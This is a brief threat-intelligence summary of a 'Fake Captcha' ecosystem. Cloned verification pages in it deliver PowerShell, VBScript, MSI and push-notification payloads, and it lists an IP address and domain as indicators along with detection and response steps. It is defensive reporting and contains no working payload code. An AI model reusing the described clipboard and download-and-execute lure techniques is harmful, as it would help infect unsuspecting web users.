The report examines a large-scale “Fake Captcha” ecosystem that weaponizes trusted web verification interfaces to deliver malicious payloads. Visual similarity across lures is not a reliable attribution signal, because the same front-end pattern can sit on top of different execution chains—PowerShell, VBScript, MSI installers, and server-driven push-notification delivery. Using high-volume perceptual hashing of screenshots, the analysis maps how the ecosystem is organized and emphasizes the separation between the user interface and the underlying payload workflow. Defenders are advised to move past cosmetic indicators and prioritize detection of execution logic and infrastructure.
Censys identified 9,494 Fake Captcha assets and used perceptual hashing to cluster them by visual similarity, finding a dominant Cloudflare-like cluster representing about 70% of observed sites. Deeper review uncovered 32 distinct payload variants spanning clipboard-driven scripts, MSI-based installers, and Matrix Push C2–style push delivery. Infrastructure analysis showed separate backend server pools supporting each technique, with cited examples including 95.164.53.115 and ghost.nestdns.com.
Detection should not depend only on visual lure characteristics or clipboard behavior. Instead, monitor for unusual browser notification permission prompts, PowerShell or VBScript download-and-execute patterns, MSI launches originating from verification-themed URLs, and network traffic associated with known Matrix Push C2 endpoints. Block or sandbox suspicious verification pages and train users to grant browser permissions only on trusted, expected sites.
When a Fake Captcha page is encountered, alert on subsequent PowerShell, VBScript, or MSI execution as well as notification subscription events. Correlate endpoint activity with network indicators such as the referenced malicious IPs and domains. Isolate impacted systems, capture volatile memory, and perform forensic analysis of any retrieved payloads.
